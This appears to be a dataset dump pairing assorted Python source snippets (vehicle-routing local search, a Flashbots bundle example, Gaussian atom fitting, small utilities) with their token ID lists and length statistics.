# except (TypeError, ValueError, OverflowError, User.DoesNotExist):
# user = None
# if user is not None and account_activation_token.check_token(user, token):
# user.is_active = True
# user.save()
# login(request, user)
# # form = LoginForm()
# # return redirect('home')
# return HttpResponse('registration/login.html')
# else:
# return HttpResponse('Activation link is invalid')
@login_required(login_url='/accounts/login')
@login_required(login_url='/accounts/login')
| [
6738,
916,
64,
13,
23914,
1330,
18957,
8479,
11,
7412,
8479,
11,
13118,
8479,
11,
5865,
929,
8479,
198,
6738,
42625,
14208,
13,
19509,
23779,
1330,
8543,
11,
445,
1060,
198,
198,
2,
13610,
534,
5009,
994,
13,
198,
6738,
42625,
14208,
... | 2.778431 | 510 |
# -*- coding: utf-8 -*-
###############################################################################
""" This file is a part of the VeRyPy classical vehicle routing problem
heuristic library and implements intra route (i.e. within one route) local
search improvement heuristics such as 2-opt, one-point-move etc. All operators
assume we start from a feasible solution. Also, all functions implementing the
operations have the following signature:
do_X_move(route, D, strategy, best_delta), where
* route is a list of nodes forming a route.The route must start and end to the
depot (index 0), e.g. [0,1,2,3,0].
* D is the symmetric full distance matrix, given as numpy-like 2darray.
Thus, D[i,j] gives the distance between nodes i and j.
* strategy is either FIRST_ACCEPT (default) or BEST_ACCEPT.
First accept returns a modified route as soon as the first improvement is
encoutered. Best accept tries all possible combinations and returns the
best one.
* best_delta is the required level of change in the in route cost. It can be
used to set the upper bound (requirement) for the improvement. Usually it
is None, which sets the level to 0.0. In that case only improving deltas are
accepted. If set to (large) positive value, best worsening move can also be
returned.
All intra route improvement operators return the new improved route and the
improvement (delta) as 2-tuple or (None,None) if no improvement was found."""
###############################################################################
#TODO:
# - support for asymmetric distances, the loops in 2-opt and 3-opt could keep
# track of the mid segments cost in reverse order with neglible performance
# impact (no added loops, just update the reverse segment cost on each iter).
# - improve performance
# - use doubly linked list (dllist) as the data structure for the routes
# - calculate nearest neighbour list of the route nodes and iterate trough it
# instead of iterating over entire route when finding potential moves
# (this is probably the single greatest pefrormance improvement that can
# be made but requires some brain time to do right)
# - do not copy routes, make changes in place
# - use numba or even cython (and numba compatible dllist)
# Written in Python 2.7, but try to maintain Python 3+ compatibility
from __future__ import print_function
from __future__ import division
from builtins import range
from local_search import LSOPT
from config import COST_EPSILON as S_EPS
__author__ = "Jussi Rasku"
__copyright__ = "Copyright 2018, Jussi Rasku"
__credits__ = ["Jussi Rasku"]
__license__ = "MIT"
__maintainer__ = "Jussi Rasku"
__email__ = "jussi.rasku@jyu.fi"
__status__ = "Development"
def do_2opt_move(route, D, strategy=LSOPT.FIRST_ACCEPT, best_delta=None):
""" 2-opt local search operation for the symmetric distances D
Remove 2 edges from the route and check if swapping then endpoints
would yield an improvement.
"""
rN = len(route)
best_move = None
if not best_delta:
best_delta = 0
accept_move = False
for i in range(0,rN-1):
for j in range(i+1,rN-1):
a = route[i]
b = route[i+1]
c = route[j]
d = route[j+1]
# a->c b->d( 2-opt move )
# _____
# / \
# >--a b-<-c -->d
# \____/
# For edges a-b and c-d, try if savings could be made by traveling
# from a-c and b-d (effectively reversing the chain from
# b to c).
delta = D[a,c] + D[b,d] \
-D[a,b]-D[c,d]
if delta+S_EPS<best_delta:
best_move = (i,j)
best_delta = delta
if strategy==LSOPT.FIRST_ACCEPT:
accept_move = True
break # j loop
if accept_move:
break # i loop
if best_move:
i,j = best_move
#print("REMOVEME:","best_move", i,j, route, best_delta)
return route[:i+1]+route[j:i:-1]+route[j+1:], best_delta
return None, None
def do_3opt_move(route, D, strategy=LSOPT.FIRST_ACCEPT, best_delta=None):
""" 3-opt local search operation for the symmetric distances D """
rN = len(route)
best_move = None
if not best_delta:
best_delta = 0
accept_move = False
for i in range(0,rN-1):
for j in range(i+1,rN-1):
for k in range(j+1,rN-1):
# the edge endpoints
a = route[i]
b = route[i+1]
c = route[j]
d = route[j+1]
e = route[k]
f = route[k+1]
#print("search abcdef", a,b,c,d,e,f)
# After removing edges a-b, c-d, and e-f, try all of the 7
# combinations in which the segments can be reconnected.
removed_weights = D[a,b] + D[c,d] + D[e,f]
# The combinations could be iterated, but for simplicity
# (and speed), the loop has been unrolled below.
## 2-opt moves
# #a->b# c->e d->f ( 2-opt move )
# _____
# / \
# >-a--b->-c d-<-e f-->
# \_____/
delta=(D[a,b] + D[c,e] + D[d,f])-removed_weights
if delta+S_EPS<best_delta:
best_move = ((None,i+1, 1), (i+1,j+1, 1),
(k,j, -1), (k+1,None, 1))
best_delta = delta
if strategy==LSOPT.FIRST_ACCEPT:
accept_move = True
break # k loop
# a->c b->d #e->f# ( 2-opt move )
# _____
# / \
# >--a b-<-c d->-e--f-->
# \____/
delta==(D[a,c] + D[b,d] + D[e,f])-removed_weights
if delta+S_EPS<best_delta:
best_move = ((None,i+1, 1), (j,i, -1),
(j+1,k+1, 1), (k+1,None, 1))
best_delta = delta
if strategy==LSOPT.FIRST_ACCEPT:
accept_move = True
break # k loop
# a->e #d->c# b->f (2-opt move)
# ____________
# / \
# >--a b-<-c--d-<-e f-->
# \___________/
delta=(D[a,e] + D[d,c] + D[b,f])-removed_weights
if delta+S_EPS<best_delta:
best_move = ((None,i+1, 1), (k,j, -1),
(j,i, -1), (k+1,None, 1))
best_delta = delta
if strategy==LSOPT.FIRST_ACCEPT:
accept_move = True
break # k loop
## 3-opt moves
# a->c b->e d->f ( 3-opt move )
# _________
# / \
# >--a b-<-c d-<-e f-->
# \____/ \____/
delta=(D[a,c] + D[b,e] + D[d,f])-removed_weights;
if delta+S_EPS<best_delta:
best_move = ((None,i+1, 1), (j,i, -1),
(k,j, -1), (k+1,None, 1))
best_delta = delta
if strategy==LSOPT.FIRST_ACCEPT:
accept_move = True
break # k loop
# a->d e->b c->f (3-opt move)
# __________
# / \
# >--a b->-c d->-e f-->
# \______\_/ /
# \______/
delta=(D[a,d] + D[e,b] + D[c,f])-removed_weights
if delta+S_EPS<best_delta:
best_move = ((None,i+1, 1), (j+1,k+1, 1),
(i+1,j+1, 1), (k+1,None, 1))
best_delta = delta
if strategy==LSOPT.FIRST_ACCEPT:
accept_move = True
break # k loop
# a->d e->c b->f (3-opt move)
# __________
# / _____ \
# / / \ \
# >--a b-<-c d->-e f-->
# \_______/
delta=(D[a,d] + D[e,c] + D[b,f])-removed_weights
if delta+S_EPS<best_delta:
best_move = ((None,i+1, 1), (j+1,k+1, 1),
(j,i, -1), (k+1,None, 1))
best_delta = delta
if strategy==LSOPT.FIRST_ACCEPT:
accept_move = True
break # k loop
# a->e b->d c->f (3-opt move)
# _______
# / \
# >--a b->-c d-<-e f-->
# \ \____/ /
# \_________/
delta=(D[a,e] + D[d,b] + D[c,f])-removed_weights
if delta+S_EPS<best_delta:
best_move = ((None,i+1, 1), (k,j, -1),
(i+1,j+1, 1), (k+1,None, 1))
best_delta = delta
if best_move and strategy==LSOPT.FIRST_ACCEPT:
accept_move = True
break # k loop
if accept_move:
break # j loop
if accept_move:
break # i loop
if best_move:
sgmt1,sgmt2,sgmt3,sgmt4 = best_move
# the head containing leaving the depot +
# the first segment, reversed or not +
# the second segment, reversed or not +
# the tail containing return to the depot
return route[sgmt1[0]:sgmt1[1]:sgmt1[2]]+\
route[sgmt2[0]:sgmt2[1]:sgmt2[2]]+\
route[sgmt3[0]:sgmt3[1]:sgmt3[2]]+\
route[sgmt4[0]:sgmt4[1]:sgmt4[2]], best_delta
return None, None
def do_relocate_move(route, D, strategy=LSOPT.FIRST_ACCEPT, best_delta=None):
"""Relocate local search operation for the symmetric distances D.
Check if a node on the route can be moved to another position on the same
route.
Please note that relocate search space is is a subset of 3-opt.
However, the search space of 3-opt is larger.
"""
rN = len(route)
best_move = None
if not best_delta:
best_delta = 0
accept_move = False
for i in range(1,rN-1):
for j in range(1,rN):
if i==j or j==i-1:
continue
a = route[i-1]
b = route[i]
c = route[i+1]
d = route[j-1]
e = route[j]
# check the no op position
if d==b or e==b:
continue
# move b from between a and c to between d and e
delta = -D[a,b]-D[b,c]+D[a,c]\
-D[d,e]+D[d,b]+D[b,e]
if delta+S_EPS<best_delta:
best_move = (i,j)
best_delta = delta
if strategy==LSOPT.FIRST_ACCEPT:
accept_move = True
break # j loop
if accept_move:
break # i loop
if best_move:
i,j = best_move
if i<j:
return route[:i]+route[i+1:j]+[route[i]]+route[j:], best_delta
else:
return route[:j]+[route[i]]+route[j:i]+route[i+1:], best_delta
return None, None
def do_exchange_move(route, D, strategy=LSOPT.FIRST_ACCEPT, best_delta=None):
"""(Node) exchange local search operation for the symmetric distances D.
Checks if two nodes on the route can be swapped.
Please note that exchange search space is is a subset of 4-opt.
However, the search space of 4-opt is significantly larger.
"""
rN = len(route)
best_move = None
if not best_delta:
best_delta = 0
accept_move = False
for i in range(1,rN-1):
for j in range(i+1,rN-1):
if i==j:
continue
a = route[i-1]
b = route[i]
c = route[i+1]
d = route[j-1]
e = route[j]
f = route[j+1]
if c==e:
delta = -D[a,b]-D[b,e]-D[e,f]\
+D[a,e]+D[e,b]+D[b,f]
else:
# swap b and e from between a and c to between d and f
delta = -D[a,b]-D[b,c]+D[a,e]+D[e,c]\
-D[d,e]-D[e,f]+D[d,b]+D[b,f]
#print("REMOVEME:", i,j, "(", delta, ")", "best =", best_delta)
if delta+S_EPS<best_delta:
best_move = (i,j)
best_delta = delta
if strategy==LSOPT.FIRST_ACCEPT:
accept_move = True
break # j loop
if accept_move:
break # i loop
if best_move:
i,j = best_move
return route[:i]+[route[j]]+route[i+1:j]+[route[i]]+route[j+1:], best_delta
return None, None
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
29113,
29113,
7804,
4242,
21017,
198,
37811,
770,
2393,
318,
257,
636,
286,
262,
8016,
46987,
20519,
15993,
4038,
28166,
1917,
198,
258,
27915,
5888,
290,
23986,
23422,
63... | 1.727668 | 8,049 |
import logging
from pbase.papp import TRAIN_TAG, VALID_TAG, TEST_TAG
from pbase.papp.logger import Logger
| [
11748,
18931,
198,
198,
6738,
279,
8692,
13,
79,
1324,
1330,
29125,
1268,
62,
42197,
11,
26173,
2389,
62,
42197,
11,
43001,
62,
42197,
198,
6738,
279,
8692,
13,
79,
1324,
13,
6404,
1362,
1330,
5972,
1362,
198
] | 2.815789 | 38 |
#!/usr/bin/env python3.8
# -*- coding: utf-8 -*-
"""
**Created:** ??.??.2022
**Modified:** ??.??.2022
**Authors:** [Tobias Rosskopf](mailto:tobirosskopf@gmail.com)
<module_name>'s docstring
"""
class ClassName:
"""
Class for <ClassName>
"""
def __init__(self, name: str = "") -> None:
"""
<ClassName> constructor
Args:
name (str): Name of instance
"""
self.name: str = name
def __repr__(self) -> str:
"""
Generates REPL representation for <ClassName>
Returns:
str: REPL representation
"""
return f"{self.__class__.__name__}({self.name})"
def __str__(self) -> str:
"""
Generates string representation for <ClassName>
Returns:
str: String representation
"""
return f"{self.name}"
def __eq__(self, other: object) -> bool:
"""
Checks if <ClassName> instance is equal to other
Args:
other (object): Other object
Returns:
bool: True if equal, False otherwise
"""
if isinstance(other, ClassName):
return self.name == other.name
return False
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
18,
13,
23,
198,
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
198,
37811,
198,
1174,
41972,
25,
1174,
220,
220,
220,
19153,
13,
3548,
13,
1238,
1828,
198,
1174,
5841,
... | 2.120482 | 581 |
import numpy as np
from shfl.federated_aggregator.fedavg_aggregator import FedAvgAggregator
| [
11748,
299,
32152,
355,
45941,
198,
198,
6738,
427,
2704,
13,
69,
5702,
515,
62,
9460,
2301,
1352,
13,
19082,
615,
70,
62,
9460,
2301,
1352,
1330,
10169,
48997,
46384,
2301,
1352,
628
] | 2.848485 | 33 |
from scipy.sparse import load_npz
from scipy.spatial import distance
from joblib import Parallel
from joblib import delayed
def chunks(lst, n):
"""
Yield successive n-sized chunks from lst.
from:
https://stackoverflow.com/questions/312443/how-do-you-split-a-list-into-evenly-sized-chunks
"""
for i in range(0, len(lst), n):
yield lst[i:i + n]
# Import one-hot encoded architectures
macro_one_hot_archs = load_npz('one_hot_encoded_unique_macro_archs.npz')
macro_one_hot_archs = macro_one_hot_archs.todense()
print('Read archs')
# Create neighborhood graph
n_nodes = macro_one_hot_archs.shape[0]
print('nodes: ', n_nodes)
f = open('distances2.txt', 'w')
dists = \
Parallel(n_jobs=-1,
verbose=10,
batch_size=32768,
backend='multiprocessing')(delayed(_proc)(x, y)
for x in range(int(n_nodes // 2))
for y in range(n_nodes)
if x < y)
print('calculated dists')
print("END!")
| [
198,
6738,
629,
541,
88,
13,
82,
29572,
1330,
3440,
62,
37659,
89,
198,
6738,
629,
541,
88,
13,
2777,
34961,
1330,
5253,
198,
6738,
1693,
8019,
1330,
42945,
198,
6738,
1693,
8019,
1330,
11038,
628,
198,
4299,
22716,
7,
75,
301,
11,
... | 2.049713 | 523 |
import csv
import numpy as np
import os
import re
import scipy.stats
import sys
import time
# Given a regular expression, list the files that match it, and ask for user input
# Given a regular expression, list the directories that match it, and ask for user input
# List the files with a regular expression
# Change the color of text in the terminal
# Leaving the forground or background blank will reset the color to its default
# Providing a message will return the colored message (reset to default afterwards)
# If it's not working for you, be sure to call os.system('cls') before modifying colors
# Usage:
# - print(color('black', 'white', 'Inverted') + ' Regular')
# - print(color('black', 'white') + 'Inverted' + color() + ' Regular')
# Return the +- value after a set of data
directory = selectDir('.*Logs.*', True)
csvFiles = listFiles(r'.*\_parsed_handshake.csv', directory)
for inputFileName in csvFiles:
print(f'Processing "{inputFileName}"...')
readerFile = open(inputFileName, 'r')
reader = csv.reader(x.replace('\0', '') for x in readerFile)
temp_header = next(reader)
handshake_durations = []
for row in reader:
handshake_duration = float(row[3])
handshake_durations.append(handshake_duration)
top_95_quantile = percentile(handshake_durations, 95)
print(f' Top 95% percentile: {top_95_quantile}')
readerFile.close()
# 95 quantile has now been computed
outputFilePath = os.path.join(directory, os.path.basename(inputFileName[:-4] + '_remove95percentile.csv'))
outputFile = open(outputFilePath, 'w', newline='')
outputWriter = csv.writer(outputFile)
readerFile = open(inputFileName, 'r')
reader = csv.reader(x.replace('\0', '') for x in readerFile)
temp_header = next(reader)
outputWriter.writerow(temp_header)
removedRows = 0
totalRows = 0
for row in reader:
totalRows += 1
handshake_duration = float(row[3])
if handshake_duration >= top_95_quantile:
removedRows += 1
continue
outputWriter.writerow(row)
readerFile.close()
outputFile.close()
print(f' {removedRows} / {totalRows} rows were removed.')
print(f' Saved to {outputFilePath}')
print('Goodbye.')
sys.exit()
| [
11748,
269,
21370,
198,
11748,
299,
32152,
355,
45941,
198,
11748,
28686,
198,
11748,
302,
198,
11748,
629,
541,
88,
13,
34242,
198,
11748,
25064,
198,
11748,
640,
198,
198,
2,
11259,
257,
3218,
5408,
11,
1351,
262,
3696,
326,
2872,
3... | 3.009763 | 717 |
import threading
import time
from datetime import datetime
class StartOverException(Exception):
"""Raise to restart the reminder thread loop"""
pass
# TODO set a limit on reminders per user? also same for offlinemessages
| [
11748,
4704,
278,
198,
11748,
640,
198,
6738,
4818,
8079,
1330,
4818,
8079,
628,
198,
4871,
7253,
5886,
16922,
7,
16922,
2599,
198,
220,
220,
220,
37227,
21762,
786,
284,
15765,
262,
15438,
4704,
9052,
37811,
198,
220,
220,
220,
1208,
... | 3.698413 | 63 |
from flask.views import MethodView
from flask import jsonify, request, abort, redirect, url_for
from impi.get_impi import *
import logging
import json
| [
6738,
42903,
13,
33571,
1330,
11789,
7680,
198,
6738,
42903,
1330,
33918,
1958,
11,
2581,
11,
15614,
11,
18941,
11,
19016,
62,
1640,
198,
6738,
848,
72,
13,
1136,
62,
11011,
72,
1330,
1635,
198,
11748,
18931,
198,
11748,
33918,
198
] | 3.682927 | 41 |
import os
from threading import Condition
from typing import Any, List, Optional, Tuple
from socketio import Client, ClientNamespace
from .common.configuration import configure
from .comparator import JsonDataComparator
from .interaction import Interaction, InteractionLoader
from .runner import FailedInteraction, ScenarioRunner
from .scenario import Scenario, ScenarioFragmentLoader
SESSION_ID_KEY = "session_id"
EVENT_BOT_UTTERED = "bot_uttered"
EVENT_USER_UTTERED = "user_uttered"
ENV_BOT_RESPONSE_TIMEOUT = "BOT_RESPONSE_TIMEOUT"
BOT_RESPONSE_TIMEOUT = float(os.environ.get(ENV_BOT_RESPONSE_TIMEOUT, 6.0))
IS_USER_MESSAGE = True
IS_BOT_MESSAGE = False
@configure(
"protocol.url", InteractionLoader, ScenarioFragmentLoader, JsonDataComparator
)
| [
11748,
28686,
198,
6738,
4704,
278,
1330,
24295,
198,
6738,
19720,
1330,
4377,
11,
7343,
11,
32233,
11,
309,
29291,
198,
198,
6738,
17802,
952,
1330,
20985,
11,
20985,
36690,
10223,
198,
198,
6738,
764,
11321,
13,
11250,
3924,
1330,
174... | 2.91954 | 261 |
# -*- coding: utf-8 -*-
import numpy as np
np.set_printoptions(precision=3, linewidth=256)
from dyconnmap.ts import fdr, surrogate_analysis
if __name__ == "__main__":
rng = np.random.RandomState(0)
data = np.load(
"/home/makism/Github/dyconnmap/examples/data/eeg_32chans_10secs.npy")
ts1 = data[0, :].ravel()
ts2 = data[1, :].ravel()
p_val, corr_surr, surrogates, r_value = surrogate_analysis(
ts1, ts2, num_surr=1000, ts1_no_surr=True, rng=rng)
num_ts = 2
p_vals = np.ones([num_ts * (num_ts - 1) / 2, 1]) * p_val
q = 0.01
method = 'pdep'
h, crit_p = fdr(p_vals, q, method)
print("p-value: {0}, h: {1} (critical p-value: {2})".format(p_val, h, crit_p))
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
198,
11748,
299,
32152,
355,
45941,
198,
37659,
13,
2617,
62,
4798,
25811,
7,
3866,
16005,
28,
18,
11,
9493,
413,
5649,
28,
11645,
8,
198,
198,
6738,
20268,
37043,
889... | 2.07781 | 347 |
import setuptools
setuptools.setup(
name="xgbatch",
version="0.0.2",
author="Eric Henry",
description="High Performance Serving for XGBoost",
url="https://github.com/ehenry2/xgbatch",
packages=["xgbatch"],
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
install_requires=[
"pyarrow>=3.0.0",
"xgboost>=1.0.0",
"numpy>=1.0.0",
"ujson",
"opentracing"
],
python_requires=">=3.6",
)
| [
11748,
900,
37623,
10141,
628,
198,
2617,
37623,
10141,
13,
40406,
7,
198,
220,
220,
220,
1438,
2625,
87,
22296,
963,
1600,
198,
220,
220,
220,
2196,
2625,
15,
13,
15,
13,
17,
1600,
198,
220,
220,
220,
1772,
2625,
25004,
8616,
1600,... | 2.149254 | 268 |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-11-26 10:54
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
2,
2980,
515,
416,
37770,
352,
13,
940,
13,
17,
319,
1584,
12,
1157,
12,
2075,
838,
25,
4051,
198,
6738,
11593,
37443,
834,
1330,
28000,
1098,
62,
17201,
874,
198,
1... | 2.73913 | 69 |
from eth_account.signers.local import LocalAccount
from web3.middleware import construct_sign_and_send_raw_middleware
from flashbots import flashbot
from flashbots.types import SignTx
from eth_account.account import Account
from web3 import Web3, HTTPProvider
from web3.types import TxParams, Wei
import os
"""
In this example we setup a transaction for 0.1 eth with a gasprice of 1
From here we will use Flashbots to pass a bundle with the needed content
"""
ETH_ACCOUNT_SIGNATURE: LocalAccount = Account.from_key(
os.environ.get("ETH_SIGNATURE_KEY")
)
ETH_ACCOUNT_FROM: LocalAccount = Account.from_key(os.environ.get("ETH_PRIVATE_FROM"))
ETH_ACCOUNT_TO: LocalAccount = Account.from_key(os.environ.get("ETH_PRIVATE_TO"))
print("Connecting to RPC")
# Setup w3 and flashbots
w3 = Web3(HTTPProvider("http://localhost:8545"))
w3.middleware_onion.add(construct_sign_and_send_raw_middleware(ETH_ACCOUNT_FROM))
flashbot(w3, ETH_ACCOUNT_SIGNATURE)
print(
f"From account {ETH_ACCOUNT_FROM.address}: {w3.eth.get_balance(ETH_ACCOUNT_FROM.address)}"
)
print(
f"To account {ETH_ACCOUNT_TO.address}: {w3.eth.get_balance(ETH_ACCOUNT_TO.address)}"
)
# Setting up an transaction with 1 in gasPrice where we are trying to send
print("Sending request")
params: TxParams = {
"from": ETH_ACCOUNT_FROM.address,
"to": ETH_ACCOUNT_TO.address,
"value": w3.toWei("1.0", "gwei"),
"maxFeePerGas": 0,
"maxPriorityFeePerGas": 0,
"nonce": w3.eth.get_transaction_count(ETH_ACCOUNT_FROM.address),
}
try:
tx = w3.eth.send_transaction(
params,
)
print("Request sent! Waiting for receipt")
except ValueError as e:
# Skipping if TX already is added and pending
if "replacement transaction underpriced" in e.args[0]["message"]:
print("Have TX in pool we can use for the example")
else:
raise
print("Setting up flashbots request")
nonce = w3.eth.get_transaction_count(ETH_ACCOUNT_FROM.address)
bribe = w3.toWei("0.01", "ether")
signed_tx: SignTx = {
"to": ETH_ACCOUNT_TO.address,
"value": bribe,
"nonce": nonce + 1,
"maxFeePerGas": 0,
"gas": 25000,
}
signed_transaction = ETH_ACCOUNT_TO.sign_transaction(signed_tx)
bundle = [
# some transaction
{
"signer": ETH_ACCOUNT_FROM,
"transaction": {
"to": ETH_ACCOUNT_TO.address,
"value": Wei(123),
"nonce": nonce,
"maxFeePerGas": 0,
},
},
# the bribe
{
"signed_transaction": signed_transaction.rawTransaction,
},
]
block = w3.eth.block_number
result = w3.flashbots.send_bundle(bundle, target_block_number=w3.eth.blockNumber + 3)
result.wait()
receipts = result.receipts()
block_number = receipts[0].blockNumber
# the miner has received the amount expected
bal_before = w3.eth.get_balance(ETH_ACCOUNT_FROM.address, block_number - 1)
bal_after = w3.eth.get_balance(ETH_ACCOUNT_FROM.address, block_number)
profit = bal_after - bal_before - w3.toWei("2", "ether") # sub block reward
print("Balance before", bal_before)
print("Balance after", bal_after)
assert profit == bribe
# the tx is successful
print(w3.eth.get_balance(ETH_ACCOUNT_TO.address))
| [
6738,
4555,
62,
23317,
13,
12683,
364,
13,
12001,
1330,
10714,
30116,
198,
6738,
3992,
18,
13,
27171,
1574,
1330,
5678,
62,
12683,
62,
392,
62,
21280,
62,
1831,
62,
27171,
1574,
198,
198,
6738,
7644,
42478,
1330,
7644,
13645,
198,
673... | 2.557166 | 1,242 |
import cv2 as cv
#hsv 调试
## 调用次方法,传入文件路径
if __name__ == '__main__':
##使用:
h=Hsv_change()
h.inRange_byFilePath("chest/stage.jpg")
| [
11748,
269,
85,
17,
355,
269,
85,
198,
220,
220,
220,
1303,
11994,
85,
5525,
108,
225,
46237,
243,
198,
220,
198,
220,
198,
220,
220,
220,
22492,
5525,
108,
225,
18796,
101,
162,
105,
94,
43095,
37345,
243,
11,
27670,
254,
17739,
... | 1.4375 | 112 |
# -*- coding: utf-8 -*-
"""
@author: Ondrej Dyck
"""
from __future__ import division, print_function, absolute_import, unicode_literals
import numpy as np
from scipy.optimize import least_squares
import itertools as itt
import multiprocessing as mp
import time as tm
import matplotlib.pyplot as plt
from ...core.io.io_utils import recommend_cpu_cores
from ...io.virtual_data import VirtualDataset, VirtualGroup
from ...io.hdf_writer import HDFwriter
from ...core.viz.plot_utils import cmap_jet_white_center
def gauss_2d_residuals(parms_vec, orig_data_mat, x_data, y_data, **kwargs):
"""
Calculates the residual
Parameters
----------
parms_vec : 1D numpy.ndarray
Raveled version of the parameters matrix
orig_data_mat : 2D numpy array
Section of the image being fitted
x_data : 3D numpy.ndarray
y_data : numpy.ndarray
Returns
-------
err_vec : 1D numpy.ndarray
Difference between the original data and the matrix obtained by evaluating parms_vec with x_data_mat
"""
# Only need to reshape the parms from 1D to 2D
parms_mat = np.reshape(parms_vec, (-1, 7))
# print(parms_mat)
err = orig_data_mat - gauss2d(x_data, y_data, *parms_mat, **kwargs).ravel()
return err
def gauss2d(X, Y, *parms, **kwargs):
"""
Calculates a general 2d elliptic gaussian
Parameters
----------
X, Y : the x and y matrix values from the call "X, Y = np.meshgrid(x,y)" where x and y are
defined by x = np.arange(-width/2,width/2) and y = np.arange(-height/2,height/2).
parms: List of 7 parameters defining the gaussian.
The parameters are [A, x0, y0, sigma_x, sigma_y, theta, background]
A : amplitude
x0: x position
y0: y position
sigma_x: standard deviation in x
sigma_y: standard deviation in y
theta: rotation angle
background: a background constant
Returns
-------
Returns a width x height matrix of values representing the call to the gaussian function at each position.
"""
symmetric = kwargs['symmetric']
background = kwargs['background']
Z = np.zeros(np.shape(X))
background_value = parms[0][-1] # we can only have one background value for the fit region
for guess in parms:
# each gaussian has a background associated with it but we only use the center atom background
A, x0, y0, sigma_x, sigma_y, theta, background_unused = guess
# determine which type of gaussian we want
if symmetric:
sigma_y = sigma_x
if not background:
background = 0
else:
if not background:
background = 0
# define some variables
a = np.cos(theta) ** 2 / (2 * sigma_x ** 2) + np.sin(theta) ** 2 / (2 * sigma_y ** 2)
b = -np.sin(2 * theta) / (4 * sigma_x ** 2) + np.sin(2 * theta) / (4 * sigma_y ** 2)
c = np.sin(theta) ** 2 / (2 * sigma_x ** 2) + np.cos(theta) ** 2 / (2 * sigma_y ** 2)
# calculate the final value
Z += A * np.exp(- (a * (X - x0) ** 2 - 2 * b * (X - x0) * (Y - y0) + c * (Y - y0) ** 2)) + background_value
return Z
class Gauss_Fit(object):
"""
Initializes the gaussian fitting routines:
fit_motif()
fit_atom_positions_parallel()
write_to_disk()
Parameters
----------
atom_grp : h5py.Group reference
Parent group containing the atom guess positions, cropped clean image and motif positions
fitting_parms : dictionary
Parameters used for atom position fitting
'fit_region_size': region to consider when fitting. Should be large enough to see the nearest neighbors.
'num_nearest_neighbors': the number of nearest neighbors to fit
'sigma_guess': starting guess for gaussian standard deviation. Should be about the size of an atom width in
pixels.
'position_range': range that the fitted position can move from initial guess position in pixels
'max_function_evals': maximum allowed function calls; passed to the least squares fitter
'fitting_tolerance': target difference between the fit and the data
'symmetric': flag to signal if a symmetric gaussian is desired (i.e. sigma_x == sigma_y)
'background': flag to signal if a background constant is desired
'movement_allowance': percent of movement allowed (on all parameters except x and y positions
"""
def fit_atom_positions_parallel(self, plot_results=True, num_cores=None):
"""
Fits the positions of N atoms in parallel
Parameters
----------
plot_results : optional boolean (default is True)
Specifies whether to output a visualization of the fitting results
num_cores : unsigned int (Optional. Default = available logical cores - 2)
Number of cores to compute with
Creates guess_dataset and fit_dataset with the results.
Returns
-------
fit_dataset: NxM numpy array of tuples where N is the number of atoms fit and M is the number of nearest
neighbors considered. Each tuple contains the converged values for each gaussian.
The value names are stored in the dtypes.
"""
t_start = tm.time()
if num_cores is None:
num_cores = recommend_cpu_cores(self.num_atoms, requested_cores=num_cores, lengthy_computation=False)
print('Setting up guesses')
self.guess_parms = []
for i in range(self.num_atoms):
self.guess_parms.append(self.do_guess(i))
print('Fitting...')
if num_cores > 1:
pool = mp.Pool(processes=num_cores)
parm_list = itt.izip(self.guess_parms, itt.repeat(self.fitting_parms))
chunk = int(self.num_atoms / num_cores)
jobs = pool.imap(do_fit, parm_list, chunksize=chunk)
self.fitting_results = [j for j in jobs]
pool.close()
else:
parm_list = itt.izip(self.guess_parms, itt.repeat(self.fitting_parms))
self.fitting_results = [do_fit(parm) for parm in parm_list]
print('Finalizing datasets...')
self.guess_dataset = np.zeros(shape=(self.num_atoms, self.num_nearest_neighbors + 1),
dtype=self.atom_coeff_dtype)
self.fit_dataset = np.zeros(shape=self.guess_dataset.shape, dtype=self.guess_dataset.dtype)
for atom_ind, single_atom_results in enumerate(self.fitting_results):
types = np.hstack((self.h5_guess['type'][atom_ind],
[self.h5_guess['type'][neighbor] for neighbor in self.closest_neighbors_mat[atom_ind]]))
atom_data = np.hstack((np.vstack(types), single_atom_results))
atom_data = [tuple(element) for element in atom_data]
self.fit_dataset[atom_ind] = atom_data
single_atom_guess = self.guess_parms[atom_ind]
atom_guess_data = np.hstack((np.vstack(types), single_atom_guess[1]))
atom_guess_data = [tuple(element) for element in atom_guess_data]
self.guess_dataset[atom_ind] = atom_guess_data
tot_time = np.round(tm.time() - t_start)
print('Took {} sec to find {} atoms with {} cores'.format(tot_time, len(self.fitting_results), num_cores))
# if plotting is desired
if plot_results:
fig, axis = plt.subplots(figsize=(14, 14))
axis.hold(True)
axis.imshow(self.cropped_clean_image, interpolation='none', cmap="gray")
axis.scatter(self.guess_dataset[:, 0]['y'], self.guess_dataset[:, 0]['x'], color='yellow', label='Guess')
axis.scatter(self.fit_dataset[:, 0]['y'], self.fit_dataset[:, 0]['x'], color='red', label='Fit')
axis.legend()
fig.tight_layout()
fig.show()
return self.fit_dataset
def do_guess(self, atom_ind, initial_motifs=False):
"""
Fits the position of a single atom.
Parameters
----------
atom_ind : int
The index of the atom to generate guess parameters for
initial_motifs : optional boolean (default is False)
Specifies whether we are generating guesses for the initial motifs. Subsequent guesses
have the advantage of the fits from the motifs and will be much better starting values.
Returns
-------
atom_ind : int
The index of the atom to generate guess parameters for
coef_guess_mat : 2D numpy array
Initial guess parameters for all the gaussians.
fit_region : 2D numpy array
The fit region cropped from the image
s1 and s2 : 2D numpy arrays
The required input for the X and Y parameters of gauss2d
lb_mat and ub_mat : 2D numpy arrays
The lower and upper bounds for the fitting.
"""
fit_region_size = self.fitting_parms['fit_region_size']
movement_allowance = self.fitting_parms['movement_allowance']
position_range = self.fitting_parms['position_range']
# start writing down initial guesses
x_center_atom = self.h5_guess['x'][atom_ind]
y_center_atom = self.h5_guess['y'][atom_ind]
x_neighbor_atoms = [self.h5_guess['x'][self.closest_neighbors_mat[atom_ind][i]] for i in
range(self.num_nearest_neighbors)]
